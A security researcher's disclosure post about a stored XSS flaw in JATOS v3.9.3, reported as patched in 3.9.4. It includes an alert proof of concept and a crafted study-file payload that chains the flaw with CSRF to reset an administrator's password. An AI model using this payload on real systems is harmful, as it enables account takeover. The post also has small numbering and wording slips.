CVE-2024–51380 | JATOS v3.9.3 Stored XSS | Properties Component

Introduction to CVE #2

CVE #1 highlights a critical security vulnerability within the application that poses significant risks to user data and system integrity. This Stored XSS (Cross-Site Scripting) flaw enables an attacker to execute JavaScript in a user’s browser, leading to unauthorized actions and account takeover.

What is JATOS

JATOS is a powerful web-based platform designed to conduct psychological experiments and surveys online. It enables researchers to create, distribute, and gather data from participants in a controlled environment, making it a versatile tool in the field of psychological research.

The platform boasts a user-friendly interface that allows researchers to set up experiments without requiring extensive programming knowledge, making it accessible to a broader audience. Additionally, JATOS supports multi-platform usage, enabling experiments to be run on various devices, including computers, tablets, and smartphones, which significantly expands participant reach.

One of the standout features of JATOS is its real-time data collection capability, which allows researchers to gather and analyze results efficiently. It also offers integration with other tools and platforms, providing flexibility in experimental design. As an open-source software, JATOS allows researchers to customize the platform according to their specific needs, further enhancing its utility.

JATOS was developed by Kristian Lange and Elisa Filevich, who aimed to create an effective solution for online research. Speaking with Kristian, he made me understand that he is currently the only developer still maintaining JATOS. This is particularly impressive given the extensive capabilities of the platform and the demands of ongoing development and support. It’s an amazing achievement for a solo developer to sustain such a robust and widely used tool in the research community.

I want to highlight that, thanks to the excellent collaboration with Kristian, the issues identified in this blog article have been successfully patched in version 3.9.4.

Exploitation Phase

Now that you clearly understand what JATOS is, let’s delve deeper into the specifics of this CVE and explore how an attacker might exploit it. We will begin by demonstrating a straightforward vulnerability and then illustrate a relevant use case in which an attacker could leverage this vulnerability against an administrator to gain elevated privileges.

Simple Exploitation

To exploit the Stored XSS vulnerability in the properties component of the study section, an attacker can export a study, modify the .jas file to include <script>alert(1)</script> in the first UUID section, and then re-import the study. When the properties section is accessed, the JavaScript will be executed. This is particularly concerning because if a study containing such a payload is assigned to an admin, the admin may inadvertently execute JavaScript crafted by a user in their browser.

A strong recommendation to address this issue is to implement a check within the .jas file to ensure that HTML and JavaScript tags are not present in disallowed areas.

Attacker Scenario Exploiting the Vulnerability

This vulnerability could be exploited in conjunction with CVE #4 | JATOS v3.9.3 CSRF | Admin Password Reset, enabling a regular user to reset an admin password.

To exploit this vulnerability, the user would first create a new study within the application. After setting up the study, they would export the corresponding .jas file. Next, the user would modify this file to embed a malicious JavaScript snippet inside the UUID. Once the modifications are complete, the user would re-import the study back into the application. Afterward, they would assign the study to an administrator. Finally, when the admin clicks on the properties section of the study, the embedded JavaScript executes, potentially compromising the system.

{"version":"3","data":{"uuid":"<form action='http://localhost.com:9000/jatos/user/passwordByAdmin' method='POST'><input type='hidden' name='newPassword' value='adminnewpassword123'><input type='hidden' name='username' value='admin'><button type='submit'>Submit</button></form>","title":"testing","description":"","groupStudy":false,"linearStudy":false,"allowPreview":true,"dirName":"admin","comments":"","jsonData":null,"endRedirectUrl":"","studyEntryMsg":"hi guys","componentList":[],"batchList":[{"uuid":"12345","title":"Default","active":true,"maxActiveMembers":null,"maxTotalMembers":null,"maxTotalWorkers":null,"allowedWorkerTypes":["PersonalSingle","Jatos","PersonalMultiple"],"comments":null,"jsonData":null}]}}

When the administrator clicks on the description section of this study, a CSRF attack is triggered to change the admin password, effectively granting the attacker administrative privileges.

This enables the attacker to log into the admin account, compromising the integrity, confidentiality, and availability of the application, especially if any studies are deleted.

Related CVE References

• CVE-2024–51379 | JATOS v3.9.3 Stored XSS | Description Component
• CVE-2024–51381 | JATOS v3.9.3 CSRF | Admin Account Creation
• CVE-2024–51382 | JATOS v3.9.3 CSRF | Admin Password Reset

Other References

For the latest updates on my developments and research, be sure to check out my GitHub profile.